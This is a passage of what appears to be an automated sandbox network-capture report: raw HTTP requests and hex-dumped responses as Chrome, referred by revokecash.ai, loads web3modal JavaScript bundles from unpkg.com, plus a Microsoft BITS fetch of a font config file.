6b 2e 0d 65 c1 ac b8 35 97 06 b2 e0 d6 5c 1a cb
                                                                          Data Ascii: #`X,`X,`X,`X,`X,`X,`X,`X,`X,`X,`X,`X,cU&rX,.e5\Ypk.e5\Ypk.e5\Ypk.e5\Ypk.e5\Ypk.e5\
                                                                          2023-12-10 16:44:17 UTC1369INData Raw: b1 1c 93 88 5e eb 43 df 50 8d b9 cc 6b ea 35 a0 ad 8a 1d 6a 38 e4 cd 9b 55 8a 3b 10 6c 78 e4 f8 e8 ff 00 ed 69 fc 5f d3 f5 db d3 e3 af f6 6a c9 dd 39 eb 78 7b 51 5e 1e d4 57 87 b5 15 e1 ed 45 78 7b 51 5e 1e d4 57 87 b5 15 d9 9d 02 6a 53 bd 9b 3e db 20 0c a0 40 5a be 90 f4 3e 9c 9a 43 75 42 12 bf 24 d2 76 9a 5e 8c 22 23 5e 2d 86 53 ea ca 66 fd a3 a7 d0 d3 34 c2 5d 8e b7 d1 d4 0a 17 ed 44 bd 5d 6a 75 15 a9 a0 6d a2 ec c7 50 b4 88 ce 4e da 8f ff 00 d0 84 96 83 43 bc 35 38 a3 75 da dd 2c e1 b8 f6 85 a5 36 8d c1 bb 37 d9 f3 b1 30 59 9f b6 f2 ed 5a b4 4b b1 d1 75 35 6c 96 af 07 1b 53 b3 1a ec fd fe a6 84 c6 4e fb be ea 2b b6 be 58 c0 5b 11 66 f6 8e d2 e8 c7 aa c0 05 0f 87 75 15 e1 ed 45 78 7b 51 5e 1e d4 57 87 b5 15 e1 ed 45 78 7b 51 5e 1e d4 57 87 b5 15 e1 ed
                                                                          Data Ascii: ^CPk5j8U;lxi_j9x{Q^WEx{Q^WjS> @Z>CuB$v^"#^-Sf4]D]jumPNC58u,670YZKu5lSN+X[fuEx{Q^WEx{Q^W


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.2.54972623.204.76.112443
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:17 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          Accept-Encoding: identity
                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                          Range: bytes=0-2147483646
                                                                          User-Agent: Microsoft BITS/7.8
                                                                          Host: fs.microsoft.com
                                                                          2023-12-10 16:44:17 UTC531INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 31 36 20 4d 61 79 20 32 30 31 37 20 32 32 3a 35 38 3a 30 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 30 78 36 34 36 36 37 46 37 30 37 46 46 30 37 44 36 32 42 37 33 33 44 42 43 42 37 39 45 46 45 33 38 35 35 45 36 38 38 36 43 39 39 37 35 42 30 43 30 42 34 36 37 44 34 36 32 33 31 42 33 46 41 35 45 37 22 0d 0a 41 70 69 56 65 72 73 69 6f 6e 3a 20 44 69 73 74 72 69 62 75 74 65 20 31 2e 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6f 6e 66 69 67
                                                                          Data Ascii: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 16 May 2017 22:58:00 GMTETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"ApiVersion: Distribute 1.1Content-Disposition: attachment; filename=config
                                                                          2023-12-10 16:44:17 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.549729104.16.123.1754435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:18 UTC559OUTGET /@web3modal/ethereum@2.7.1 HTTP/1.1
                                                                          Host: unpkg.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:18 UTC548INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 2f 40 77 65 62 33 6d 6f 64 61 6c 2f 65 74 68 65 72 65 75 6d 40 32 2e 37 2e 31 2f
                                                                          Data Ascii: HTTP/1.1 302 FoundDate: Sun, 10 Dec 2023 16:44:18 GMTContent-Type: text/plain; charset=utf-8Transfer-Encoding: chunkedConnection: closeaccess-control-allow-origin: *cache-control: public, max-age=31536000location: /@web3modal/ethereum@2.7.1/
                                                                          2023-12-10 16:44:18 UTC73INData Raw: 34 33 0d 0a 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 40 77 65 62 33 6d 6f 64 61 6c 2f 65 74 68 65 72 65 75 6d 40 32 2e 37 2e 31 2f 64 69 73 74 2f 63 64 6e 2f 62 75 6e 64 6c 65 2e 6a 73 0d 0a
                                                                          Data Ascii: 43Found. Redirecting to /@web3modal/ethereum@2.7.1/dist/cdn/bundle.js
                                                                          2023-12-10 16:44:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.549728104.16.123.1754435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:18 UTC555OUTGET /@web3modal/html@2.7.1 HTTP/1.1
                                                                          Host: unpkg.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:18 UTC544INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 2f 40 77 65 62 33 6d 6f 64 61 6c 2f 68 74 6d 6c 40 32 2e 37 2e 31 2f 64 69 73 74
                                                                          Data Ascii: HTTP/1.1 302 FoundDate: Sun, 10 Dec 2023 16:44:18 GMTContent-Type: text/plain; charset=utf-8Transfer-Encoding: chunkedConnection: closeaccess-control-allow-origin: *cache-control: public, max-age=31536000location: /@web3modal/html@2.7.1/dist
                                                                          2023-12-10 16:44:18 UTC69INData Raw: 33 66 0d 0a 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 40 77 65 62 33 6d 6f 64 61 6c 2f 68 74 6d 6c 40 32 2e 37 2e 31 2f 64 69 73 74 2f 63 64 6e 2f 62 75 6e 64 6c 65 2e 6a 73 0d 0a
                                                                          Data Ascii: 3fFound. Redirecting to /@web3modal/html@2.7.1/dist/cdn/bundle.js
                                                                          2023-12-10 16:44:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.549731104.16.123.1754435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:19 UTC574OUTGET /@web3modal/html@2.7.1/dist/cdn/bundle.js HTTP/1.1
                                                                          Host: unpkg.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:20 UTC574INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 53 61 74 2c 20 32 36 20 4f 63 74 20 31
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:19 GMTContent-Type: application/javascript; charset=utf-8Transfer-Encoding: chunkedConnection: closeaccess-control-allow-origin: *cache-control: public, max-age=31536000last-modified: Sat, 26 Oct 1
                                                                          2023-12-10 16:44:20 UTC106INData Raw: 36 34 0d 0a 69 6d 70 6f 72 74 7b 57 20 61 73 20 65 7d 66 72 6f 6d 22 2e 2f 62 75 6e 64 6c 65 2d 37 61 31 31 36 63 39 33 2e 6a 73 22 3b 65 78 70 6f 72 74 7b 65 20 61 73 20 57 65 62 33 4d 6f 64 61 6c 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 62 75 6e 64 6c 65 2e 6a 73 2e 6d 61 70 0a 0d 0a
                                                                          Data Ascii: 64import{W as e}from"./bundle-7a116c93.js";export{e as Web3Modal};//# sourceMappingURL=bundle.js.map
                                                                          2023-12-10 16:44:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.549732104.16.123.1754435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:19 UTC578OUTGET /@web3modal/ethereum@2.7.1/dist/cdn/bundle.js HTTP/1.1
                                                                          Host: unpkg.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:20 UTC575INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 31 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 53 61 74 2c 20 32 36 20 4f 63 74 20 31
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:19 GMTContent-Type: application/javascript; charset=utf-8Transfer-Encoding: chunkedConnection: closeaccess-control-allow-origin: *cache-control: public, max-age=31536000last-modified: Sat, 26 Oct 1
                                                                          2023-12-10 16:44:20 UTC282INData Raw: 31 31 33 0d 0a 69 6d 70 6f 72 74 7b 61 41 20 61 73 20 65 2c 61 77 20 61 73 20 6f 2c 61 78 20 61 73 20 73 2c 61 79 20 61 73 20 43 2c 61 7a 20 61 73 20 69 2c 61 42 20 61 73 20 6d 2c 61 43 20 61 73 20 6e 7d 66 72 6f 6d 22 2e 2f 62 75 6e 64 6c 65 2d 62 32 32 38 39 34 37 39 2e 6a 73 22 3b 65 78 70 6f 72 74 7b 65 20 61 73 20 45 74 68 65 72 65 75 6d 43 6c 69 65 6e 74 2c 6f 20 61 73 20 57 61 67 6d 69 43 6f 72 65 2c 73 20 61 73 20 57 61 67 6d 69 43 6f 72 65 43 68 61 69 6e 73 2c 43 20 61 73 20 57 61 67 6d 69 43 6f 72 65 43 6f 6e 6e 65 63 74 6f 72 73 2c 69 20 61 73 20 57 61 67 6d 69 43 6f 72 65 50 72 6f 76 69 64 65 72 73 2c 6d 20 61 73 20 77 33 6d 43 6f 6e 6e 65 63 74 6f 72 73 2c 6e 20 61 73 20 77 33 6d 50 72 6f 76 69 64 65 72 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65
                                                                          Data Ascii: 113import{aA as e,aw as o,ax as s,ay as C,az as i,aB as m,aC as n}from"./bundle-b2289479.js";export{e as EthereumClient,o as WagmiCore,s as WagmiCoreChains,C as WagmiCoreConnectors,i as WagmiCoreProviders,m as w3mConnectors,n as w3mProvider};//# source
                                                                          2023-12-10 16:44:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.549733104.16.123.1754435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:20 UTC627OUTGET /@web3modal/ethereum@2.7.1/dist/cdn/bundle-b2289479.js HTTP/1.1
                                                                          Host: unpkg.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://unpkg.com/@web3modal/ethereum@2.7.1/dist/cdn/bundle.js
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:20 UTC577INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 53 61 74 2c 20 32 36 20 4f 63 74 20 31
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:20 GMTContent-Type: application/javascript; charset=utf-8Transfer-Encoding: chunkedConnection: closeaccess-control-allow-origin: *cache-control: public, max-age=31536000last-modified: Sat, 26 Oct 1
                                                                          2023-12-10 16:44:20 UTC792INData Raw: 37 64 36 31 0d 0a 76 61 72 20 51 79 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3c 22 75 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3c 22 75 22 3f 77 69 6e 64 6f 77 3a 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3c 22 75 22 3f 67 6c 6f 62 61 6c 3a 74 79 70 65 6f 66 20 73 65 6c 66 3c 22 75 22 3f 73 65 6c 66 3a 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 4b 75 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 26 26 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 22 64 65 66 61 75 6c 74 22 29 3f 65 2e 64 65 66 61 75 6c 74 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 68 6f 28 65 29 7b 69 66 28 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 29 72 65 74
                                                                          Data Ascii: 7d61var Qy=typeof globalThis<"u"?globalThis:typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{};function Ku(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function ho(e){if(e.__esModule)ret
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 6e 65 77 20 72 28 29 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 28 6e 3d 21 31 29 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 63 2c 64 2c 6c 29 7b 74 68 69 73 2e 66 6e 3d 63 2c 74 68 69 73 2e 63 6f 6e 74 65 78 74 3d 64 2c 74 68 69 73 2e 6f 6e 63 65 3d 6c 7c 7c 21 31 7d 66 75 6e 63 74 69 6f 6e 20 61 28 63 2c 64 2c 6c 2c 68 2c 70 29 7b 69 66 28 74 79 70 65 6f 66 20 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 6c 69 73 74 65 6e 65 72 20 6d 75 73 74 20 62 65 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 76 61 72 20 66 3d 6e 65 77 20 73 28 6c 2c 68 7c 7c 63 2c 70 29 2c 6d 3d 6e 3f 6e 2b 64 3a 64 3b 72 65 74 75 72 6e 20 63 2e 5f 65 76 65 6e 74 73 5b 6d 5d
                                                                          Data Ascii: ect.create(null),new r().__proto__||(n=!1));function s(c,d,l){this.fn=c,this.context=d,this.once=l||!1}function a(c,d,l,h,p){if(typeof l!="function")throw new TypeError("The listener must be a function");var f=new s(l,h||c,p),m=n?n+d:d;return c._events[m]
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 70 2c 66 29 2c 21 30 3b 63 61 73 65 20 36 3a 72 65 74 75 72 6e 20 77 2e 66 6e 2e 63 61 6c 6c 28 77 2e 63 6f 6e 74 65 78 74 2c 6c 2c 68 2c 70 2c 66 2c 6d 29 2c 21 30 7d 66 6f 72 28 45 3d 31 2c 62 3d 6e 65 77 20 41 72 72 61 79 28 44 2d 31 29 3b 45 3c 44 3b 45 2b 2b 29 62 5b 45 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 45 5d 3b 77 2e 66 6e 2e 61 70 70 6c 79 28 77 2e 63 6f 6e 74 65 78 74 2c 62 29 7d 65 6c 73 65 7b 76 61 72 20 79 3d 77 2e 6c 65 6e 67 74 68 2c 41 3b 66 6f 72 28 45 3d 30 3b 45 3c 79 3b 45 2b 2b 29 73 77 69 74 63 68 28 77 5b 45 5d 2e 6f 6e 63 65 26 26 74 68 69 73 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 28 64 2c 77 5b 45 5d 2e 66 6e 2c 76 6f 69 64 20 30 2c 21 30 29 2c 44 29 7b 63 61 73 65 20 31 3a 77 5b 45 5d 2e 66 6e 2e 63 61 6c 6c 28 77 5b
                                                                          Data Ascii: p,f),!0;case 6:return w.fn.call(w.context,l,h,p,f,m),!0}for(E=1,b=new Array(D-1);E<D;E++)b[E-1]=arguments[E];w.fn.apply(w.context,b)}else{var y=w.length,A;for(E=0;E<y;E++)switch(w[E].once&&this.removeListener(d,w[E].fn,void 0,!0),D){case 1:w[E].fn.call(w[
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 6e 63 79 3a 7b 6e 61 6d 65 3a 22 45 74 68 65 72 22 2c 73 79 6d 62 6f 6c 3a 22 45 54 48 22 2c 64 65 63 69 6d 61 6c 73 3a 31 38 7d 2c 72 70 63 55 72 6c 73 3a 7b 61 6c 63 68 65 6d 79 3a 7b 68 74 74 70 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 72 62 2d 6d 61 69 6e 6e 65 74 2e 67 2e 61 6c 63 68 65 6d 79 2e 63 6f 6d 2f 76 32 22 5d 2c 77 65 62 53 6f 63 6b 65 74 3a 5b 22 77 73 73 3a 2f 2f 61 72 62 2d 6d 61 69 6e 6e 65 74 2e 67 2e 61 6c 63 68 65 6d 79 2e 63 6f 6d 2f 76 32 22 5d 7d 2c 69 6e 66 75 72 61 3a 7b 68 74 74 70 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 72 62 69 74 72 75 6d 2d 6d 61 69 6e 6e 65 74 2e 69 6e 66 75 72 61 2e 69 6f 2f 76 33 22 5d 2c 77 65 62 53 6f 63 6b 65 74 3a 5b 22 77 73 73 3a 2f 2f 61 72 62 69 74 72 75 6d 2d 6d 61 69 6e 6e 65 74 2e 69 6e 66 75 72 61 2e
                                                                          Data Ascii: ncy:{name:"Ether",symbol:"ETH",decimals:18},rpcUrls:{alchemy:{http:["https://arb-mainnet.g.alchemy.com/v2"],webSocket:["wss://arb-mainnet.g.alchemy.com/v2"]},infura:{http:["https://arbitrum-mainnet.infura.io/v3"],webSocket:["wss://arbitrum-mainnet.infura.
                                                                          2023-12-10 16:44:20 UTC1369INData Raw: 69 6d 61 6c 73 3a 31 38 2c 6e 61 6d 65 3a 22 45 74 68 65 72 22 2c 73 79 6d 62 6f 6c 3a 22 45 54 48 22 7d 2c 72 70 63 55 72 6c 73 3a 7b 69 6e 66 75 72 61 3a 7b 68 74 74 70 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 75 72 6f 72 61 2d 6d 61 69 6e 6e 65 74 2e 69 6e 66 75 72 61 2e 69 6f 2f 76 33 22 5d 7d 2c 64 65 66 61 75 6c 74 3a 7b 68 74 74 70 3a 5b 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6e 6e 65 74 2e 61 75 72 6f 72 61 2e 64 65 76 22 5d 7d 2c 70 75 62 6c 69 63 3a 7b 68 74 74 70 3a 5b 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6e 6e 65 74 2e 61 75 72 6f 72 61 2e 64 65 76 22 5d 7d 7d 2c 62 6c 6f 63 6b 45 78 70 6c 6f 72 65 72 73 3a 7b 65 74 68 65 72 73 63 61 6e 3a 7b 6e 61 6d 65 3a 22 41 75 72 6f 72 61 73 63 61 6e 22 2c 75 72 6c 3a 22 68 74 74 70 73 3a 2f 2f 61 75 72 6f 72 61
                                                                          Data Ascii: imals:18,name:"Ether",symbol:"ETH"},rpcUrls:{infura:{http:["https://aurora-mainnet.infura.io/v3"]},default:{http:["https://mainnet.aurora.dev"]},public:{http:["https://mainnet.aurora.dev"]}},blockExplorers:{etherscan:{name:"Aurorascan",url:"https://aurora
